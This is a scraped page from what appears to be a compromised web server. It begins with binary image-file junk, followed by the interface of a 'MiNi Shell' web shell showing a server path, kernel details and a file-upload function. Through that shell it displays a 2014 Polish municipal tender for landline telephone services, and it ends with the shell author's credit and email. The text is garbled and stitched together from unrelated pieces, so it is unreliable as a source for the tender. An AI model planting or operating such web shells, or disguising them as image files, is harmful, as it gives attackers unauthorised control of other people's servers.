JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141128/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141128/391404-N-2014.html

<p class="kh_header"><b>Piotrków Trybunalski: ŚWIADCZENIE USŁUG TELEFONII STACJONARNEJ W OKRESIE 01.01.2015R. - 31.12.2015R.</b><br>
<b>Numer ogłoszenia: 391404 - 2014; data zamieszczenia: 28.11.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Piotrków Trybunalski , ul. Pasaż Rudowskiego 10, 97-300 Piotrków Trybunalski, woj. łódzkie, tel. 044 7327796, faks 044 7327798.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.piotrkow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ŚWIADCZENIE USŁUG TELEFONII STACJONARNEJ W OKRESIE 01.01.2015R. - 31.12.2015R..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest : 
 Świadczenie usług telekomunikacyjnych w zakresie telefonii stacjonarnej dla Urzędu Miasta Piotrkowa Trybunalskiego i jednostek podległych w 2015r.
1.Szacunkowe zestawienie ilości minut w ramach poszczególnych rodzajów połączeń w skali jednego miesiąca które posłuży wyłącznie do porównania ofert.

LP	
Rodzaj połączeń	
Szacunkowa średnia ilość miesięczna połączeń w minutach
1	Połączenia lokalne i strefowe	12.100 minut
2	Połączenia  międzystrefowe	5.500 minut
3	Połączenia do sieci komórkowych	16.200 minut
4	Połączenia międzynarodowe stacjonarne do UE	100 minut
5	Połączenia informacyjne do numerów 0801-0xx xxx łącznie	400 minut
Szczegółowy wykaz jednostek organizacyjnych Miasta zawiera załącznik nr 1 do SIWZ.
            Zamawiający zastrzega, że nie zobowiązuje się do utrzymania wyżej określonej wielkości ruchu na danych kierunkach (do sieci komórkowych, lokalnych, międzystrefowych, międzynarodowych)
2. Świadczenie usług.
2.1 Świadczone w ramach umowy usługi telekomunikacyjne będą obejmowały:
- połączenia lokalne i strefowe;
- połączenia międzystrefowe;
- połączenia do sieci komórkowych;
- połączenia międzynarodowe stacjonarne do UE;
- połączenia na bezpłatne linie 0800 -0xx xxx;
- połączenia na ulgowe linie: 
0801-0xx xxx;
0801-1xx xxx;
0801-2xx xxx;
0801-3xx xxx;
0801-4xx xxx;
0804-2xx xxx;
2.2 Darmowe połączenia na skrócone numery alarmowe do służb powołanych ustawowo do niesienia pomocy, służb miejskich, służb informacyjno - interwencyjnych administracji państwowej posiadających numery skrócone np.
112- numer alarmowy do wszystkich służb,
999- pogotowie ratunkowe, 
998- straż pożarna,
997- policja, 
994- pogotowie wodociągów i kanalizacji,
992- pogotowie gazowni, 
991- pogotowie energetyczne, 
986- straż miejska, 
2.3 Inicjowanie połączeń  bez naliczania dodatkowych opłat lub stosowania szczególnych taryfikatorów.
2.4  Zachowanie dotychczasowych numerów telefonów w lokalizacjach  zawartych w Załączniku  nr 1.
2.5 Podłączenie łącza w lokalizacji w miejsce wskazane przez Zamawiającego i podłączenie do istniejącej infrastruktury 
2.6  Sekundowe naliczanie czasu realizowanych rozmów telefonicznych bez opłat za inicjacje połączenia 
2.7 Możliwość korzystania z informacji o numerach telefonicznych abonentów na terenie Polski;
2.8 Możliwość  transmisji faksowej do wszystkich sieci stacjonarnych;  prezentację numerów abonentów zewnętrznych w ruchu przychodzącym o ile numer taki nie został zastrzeżony, przesyłanie dokumentów przez urządzenia typu fax.
2.9 Zablokowanie możliwości uzyskania połączeń o podwyższonej opłacie rozpoczynających się od 20, 30, 40 i 70 - dotyczy wszystkich numerów objętych niniejszym postępowaniem;
2.10 Przyjmowanie zleceń Zamawiającego dotyczących zablokowania lub odblokowania określonych przez Zamawiającego połączeń lub usług dla numerów telefonicznych stanowiących przedmiot zamówienia, w terminie nie dłuższym niż 24 godziny od czasu otrzymania zlecenia;
2.11 Świadczenie usługi z zastosowaniem środków technicznych gwarantujących bezpieczeństwo przekazu informacji;
2.12 Zamawiający wymaga , aby operator wyznaczył opiekuna dla Zamawiającego i był traktowany jak klient biznesowy. 
2.13 Obsługa sytuacji awaryjnych:
a) Wykonawca udostępni Zamawiającemu krajowy numer dostępowy umożliwiający zgłaszanie nieprawidłowości w działaniu usług w trybie 24:7:365
b) czas  reakcji na zgłaszanie awarii (rozumiany jako czas od momentu przyjęcia zgłoszenia do rozpoczęcia prac w miejscu awarii) wynosi 4 godziny w systemie 24:7:365
c) czas naprawy (rozumiany jako czas od momentu przyjęcia zgłoszenia usterki                                  i przywrócenia pełnej funkcjonalności) wynosi 8 godzin w systemie 24:7:365
3. Opłata za faktyczny czas połączenia bez opłaty za inicjację połączenia;
4. Zamawiający dopuszcza wyłącznie płaski plan taryfowy, tj. bez okresów taryfikacyjnych ze względu na porę dnia oraz dni tygodnia. 
5. Połączenie pomiędzy telefonami abonenta zainstalowanymi w lokalizacjach UM i jednostek podległych  nie będą taryfikowane.
6. Wykonawca zapewnia:
-  bezpłatne okresowe przeglądy stanu technicznego pracy łącza;
- sprawdzanie parametrów łączy poprzez bieżące cykliczne ich pomiary i eliminowanie
usterek;
- techniczna pomoc związana ze świadczeniem usług telekomunikacyjnych po zgłoszeniu przez Zamawiającego nieprawidłowości w pracy łącza;
- bezpłatne usuwanie awarii łączy i infrastruktury stanowiących sieć Wykonawcy
Wszystkie koszty - instalacyjne, przejmowania łącz  ponosi Wykonawca.
  
7. Szczegółowy wykaz jednostek organizacyjnych Miasta wraz ze wskazaniem ilości numerów telefonów z każdą jednostką organizacyjną zawiera załącznik Nr 1.
Wykonawca zapewni bezpłatne połączenia pomiędzy numerami jednostek oraz jednostkami wymienionymi w Załączniku Nr 1.
8. Z każdą jednostką wymienioną w załączniku Nr 1 Operator zawrze odrębną szczegółową umowę obejmującą wykaz konkretnych numerów telefonów w danej jednostce, ich adresów, miesięczne wynagrodzenie Operatora z tytułu stałych opłat abonamentowych za te numery, stawki zadeklarowane w ofercie Wykonawcy, terminy i zasady rozliczeń oraz inne postanowienia zgodne z niniejszą umową.

9. Zamawiający dysponuje centralami telefonicznymi typu Panasonic KXT- TDA 200 wyposażonymi w  karty traktu  ISDN (30B+D);
a) lokalizacja - Pasaż Rudowskiego 10 ,
b) lokalizacja - Szkolna  28

10.1.Usługa ISDN (30B +D) w lokalizacji Pasaż Rudowskiego 10.
- 110 Nr DDI w zakresie od  Nr 044 732 76 90 do Nr 044 732 77 99 z wyjątkiem numeru 044 732 77 75; 044 732 77 90
10.2. Usługa ISDN 30B +D w lokalizacji ul. Szkolna 28.
100 Nr DDI w zakresie od  Nr 44 732 18 00 do Nr 44 732 18 99 z wyjątkiem                            - 44 732 18 08 ul. Farna 8, - 44 732 18 15 ul. Farna 8
- 44 732 18 40 ul. Farna 8- 44 732 18 48 ul. Farna 8, 44 732 18 97 ul. Sienkiewicza 16

10.3.Analogowe linie telefoniczne zainstalowane w Urzędzie Miasta Piotrkowa Trybunalskiego w następujących lokalizacjach:

- 044 732 36 61 ul. Słowackiego 19  - poza pulą DDI
- 044 732 38 62 ul. Słowackiego 19  - poza pulą DDI
- 044 732 36 60 ul. Sienkiewicza 16  - poza pulą DDI
- 044 732 36 62 ul. Sienkiewicza 16  - poza pulą DDI
- 044 732 36 64 ul. Sienkiewicza 16  - poza pulą DDI
- 044 733 90 55 ul. Sienkiewicza 16  - poza pulą DDI 
- 044 732 60 49 ul. Zamurowa 11   - poza pulą DDI
- 044 732 60 50 ul. Zamurowa 11   - poza pulą DDI
Razem 8 linii analogowych (ujęte w wykazie załącznik nr 1).

Centrale telefoniczne typu Panasonic KXT - TDA 200 wyposażone w karty traktu ISDN (30B+D)
Jednostka	Typ linii	Ilość	Numer	Ilość numerów	Uwagi
UM  Pasaż Karola Rudowskiego 10	ISDN PRA
(30B+ D)	1	od   nr     
 44 7327690
do  nr                44 7327799  z wyjątkiem  44 7327775;         44 7327790	110 DDI	Nie jest zachowana ciągłość numeracji
UM ul. Szkolna 28	ISDN PRA
(30B+ D)	1	Od nr              44 7321800 
do nr 
44 7321899 
z wyjątkiem
44 7321808
44 7321815
44 7321840
44 7321848
44 7321897	100 DDI	Nie jest zachowana ciągłość numeracji

11. Wykonawca musi dostarczać w cyklach miesięcznych pełne zestawienia billingowe. Dopuszczalne jest udostępnianie tych informacji pocztą elektroniczną lub na nośniku (CD, DVD) w terminie do 21 dni od zakończenia okresu rozliczeniowego. Zestawienie billingowe za dany miesiąc powinno zawierać wykaz wszystkich rozmów z podaniem numeru abonenta wybierającego i wybieranego, datę i godzinę rozpoczęcia połączenia, datę i godzinę zakończenia połączenia, czas rozmowy podany z dokładnością do jednej sekundy, cenę jednostkową połączenia, koszt połączenia  a  także podsumowanie kosztów rozmów według grup taryfowych podsumowanie ogółem kosztów wszystkich połączeń.  
Wykonawca zapewnieni bezpłatny dostęp do danych bilingowych.  

12. Najczęściej wykonywane międzynarodowe połączenia telefoniczne na telefony stacjonarne do następujących krajów: Litwa, Białoruś, Ukraina, Rosja, Węgry, Słowenia, Serbia, Niemcy, Holandia, Austria, Szwajcaria, Belgia, Francja, Wielka Brytania.

13. Wykonawca zapewni wszelkie formalności i procedury oraz na własny koszt przeniesienie  bez spowodowania przerw w realizacji połączeń numerów obecnie użytkowanych przez Zamawiającego. 

14. Wykonawca powinien dokonać wizji w terenie gdzie ma być zrealizowany przedmiot zamówienia i uzyskać na swoją odpowiedzialność i ryzyko wszelkie informacje , które mogą być istotne. Wizji lokalnej Wykonawca dokona na własny koszt (czas i miejsce należy ustalić z administratorem budynku w jednostce. Lokale mogą być udostępnione w godzinach ustalonych z administratorem w jednostce. 
Wykonawca załącza oświadczenie o dokonanej  wizji w każdej jednostce -  Załącznik Nr 9 do SIWZ

15. Zapewnienie łączności dla Zamawiającego we wszystkich lokalizacjach przez jednego operatora.

16. Ze względów bezpieczeństwa i zapewnienia dobrej jakości Zamawiający wyklucza możliwość realizacji połączeń w technologii VOIP i GSM. Dotyczy to połączeń do z publicznej sieci telekomunikacyjnej.

17. Realizacja usługi wykonywana będzie za pośrednictwem łącza kablowego lub radiowego pracującego w paśmie licencjonowanym dla wszystkich lokalizacji.

18.Zamawiający może dołączyć nowy numer do sieci lub przenieś do innej lokalizacji pod warunkiem pozytywnych warunków technicznych realizacji usługi.


19. Wykonawca, którego oferta zostanie wybrana będzie zobowiązany do przeniesienia w terminie nie dłuższym niż 7 dni roboczych, do istniejącej sieci tegoż Wykonawcy numerów telefonów dotychczas wykorzystywanych przez Zamawiającego,  przerwy w świadczeniu usług nie mogą być dłuższe niż 24 godziny, z zachowaniem dotychczasowej numeracji.
Zamawiający udzieli Wykonawcy pełnomocnictwa do przeprowadzenia czynności związanych z przeniesieniem numerów do sieci Wykonawcy.


 20. Wykonawca załączy do oferty: Regulamin wykonywania usług Telekomunikacyjnych - załącznik Nr 3 oraz Cennik Usług Operatora - załącznik Nr 4. Załączniki do umowy stanowiły będą (jej integralną częścią) i będą wiązały Strony w zakresie, w jakim nie są sprzeczne z zapisami umowy oraz SIWZ. W przypadku kwestii spornych pierwszeństwo mają zapisy umowy.
21. FORMULARZ CENOWY jest zawarty w formularzu ofertowym (załącznik nr 2) i stanowi  integralną część oferty. 
22. Wykonawca zobowiązuje się do dostarczenia prawidłowo wystawionych faktur VAT do poszczególnych jednostek organizacyjnych zgodnie z zawartymi umowami. 
Za datę dostarczenia faktury uważa się datę wpływu do Zamawiającego. 
23. Zamawiający przekaże Wykonawcy Harmonogram przejęcia......

Wykonawca  zapewni rozszerzenie lub przydzieli dodatkową pulę DDI w ilości 20 sztuk na wniosek Zamawiającego w trakcie obowiązującej umowy, bez dodatkowych kosztów..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 64.20.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W niniejszym postępowaniu Zamawiający nie żąda wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dotyczący posiadania wiedzy i doświadczenia, zamawiający uzna za spełniony w przypadku, gdy wykonawca:

a)wykaże co najmniej trzy zamówienia (wykonane w okresie trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie) odpowiadające rodzajem przedmiotowi niniejszego zamówienia tj. 
wykonanie trzech usług obejmujących swym zakresem świadczenie usług telefonii stacjonarnej, w kwocie 100 000 PLN brutto każda- wg załącznika nr  3;

b)załączy dokumenty potwierdzające, iż usługi wyszczególnione w załączniku nr 3 zostały wykonane lub są wykonywane w sposób należyty.
Sposób dokonania oceny spełnienia wymaganych warunków:
- przy dokonaniu oceny spełniania warunków zamawiający będzie się kierował regułą: spełnia albo nie spełnia,
- niespełnienie chociażby jednego warunku skutkować będzie wykluczeniem wykonawcy z postępowania; ofertę wykonawcy wykluczonego uznaje się za odrzuconą.
Ocena spełniania powyższych warunków nastąpi na podstawie oświadczeń lub dokumentów zawartych w ofercie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Formularz ofertowy według wzoru zawartego w specyfikacji istotnych warunków zamówienia - wg załącznika nr 2; 
2.	Regulamin wykonywania usług Telekomunikacyjnych - wg załącznika nr 3;
3.	Cennik Usług Operatora - wg załącznika nr 4;
4.	Oświadczenie o niepodleganiu wykluczeniu z postępowania na podstawie art. 24 ust 1 oraz ust 2 ustawy Pzp -  wg załącznika nr 5;
5.	Oświadczenie o niezaleganiu z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne - wg załącznika nr 7;
6.	Oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu - wg załącznika nr 8.
7.	Oświadczenie wykonawcy o dokonanej wizji w terenie - wg załącznika nr 9;</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.piotrkow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Piotrkowa Trybunalskiego
Pasaż Karola Rudowskiego 10 
Piotrków Tryb. 97-300.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.12.2014 godzina 09:00, miejsce: Urząd Miasta Piotrkowa Trybunalskiego
Pasaż Karola Rudowskiego 10 
Piotrków Tryb. 97-300 
punkt informacyjny.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com